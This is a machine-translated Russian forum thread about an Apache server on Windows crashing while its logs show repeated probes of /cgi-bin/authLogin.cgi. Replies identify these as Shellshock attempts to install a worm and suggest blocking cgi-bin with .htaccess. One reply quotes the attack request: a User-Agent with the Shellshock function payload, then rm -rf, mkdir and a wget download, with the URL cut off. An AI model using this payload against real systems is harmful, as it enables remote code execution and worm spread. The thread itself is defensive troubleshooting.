Сервер Apache http перестал работать
Привет, друзья,
Я использую сервер Ampps с php 5.3.29 в центре данных сервера Windows.
к сожалению, я получаю следующее приглашение на сервере Windows и мой сайт не работает.
Заголовок подсказки:
Майкрософт Виндоус
Быстрое сообщение:
Сервер Apache http перестал работать.
Из-за проблемы программа перестала работать правильно. Windows закроет программу и уведомит вас, если решение доступно.
Трассировка:
При отслеживании ошибок и журналов доступа я обнаружил следующие журналы как причину.
В журнале доступа Apache:
202.175.83.36 — — [10 / Dec / 2014: 05: 58: 50 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
217.248.177.30 — — [10 / Dec / 2014: 06: 11: 24 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
209.153.244.6 — — [10 / Dec / 2014: 07: 09: 17 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
81.214.132.245 — — [10 / Dec / 2014: 07: 25: 04 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
В журнале ошибок Apache:
[Ср. 10 07: 25: 04.401073 2014] [cgi: error] [pid 2908: tid 1168] [клиент 81.214.132.245:36246] сценарий не найден или не может выполнить статистику: D: / Program Files / Ampps / www / cgi -bin / authLogin.cgiПожалуйста, помогите мне.
Решение
Есть веб-бот, пытающийся получить полномочия, чтобы он мог wget и выполнить что-то вроде S0.py, который, как я думаю, является червем, поэтому сервер загрузки скомпрометирован.
Я хотел бы получить копию S0.sh, если вы случайно ее получили, и дайте ей использовать exploit-db или что-то в этом роде.
Умная команда:
Получить /cgi-bin/authLogin.cgi HTTP / 1.1.Host: 127.0.0.1. User-Agent :() {:; }; / bin / rm -rf /tmp/S0.sh && / bin / mkdir -p /share/HDB_DATA/…/php && / USR / бен / Wget
Файл выполняется после загрузки.
Полагаю, в HDB_DATA есть что-то, чего у меня даже нет.
«Информация имеет первостепенное значение!»
Другие решения
Если вы попытаетесь открыть этот файл, что произойдет?
D: / Program Files / Ampps / www / cgi-bin / authLogin.cgi
Сообщение указывает, что файл не существует, на что указывает ошибка 404 и сообщение «скрипт не найден».
Наконец, я запретил этим клиентам доступ к каталогу cgi-bin.
в каталоге cgi-bin я создал файл .htaccess
Я добавил следующую строку в .htaccess
Отрицать все.
Я не думаю, что authLogin.cgi действительно имеет значение, кроме того, что он может позволить кому-то выполнить. Проблема в том, что пользователь пытается или успешно удаляет /tmp/S0.sh и создает каталог php в папке общего доступа, а затем выполняет wget.
/ bin / rm -rf /tmp/S0.sh && / bin / mkdir -p /share/HDB_DATA/…/php && / USR / бен / Wget
Вот что пришло в голову после всего этого времени удивления:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
«S0.sh состоит из двух основных частей … первая часть выполняет начальную настройку и загружает дополнительные программы, а затем вторая часть устанавливает червя и выполняет некоторые дополнительные команды».
Так что ловить это действие было настоящим праздником, и поначалу никто не знал, что это Шеллшок. Там есть копия S0.sh, и вы можете видеть, что это червь, как я и предполагал.
Из того, что я прочитал, червь просто просматривает пространство IP в поисках любого, кто слушает порт 8080.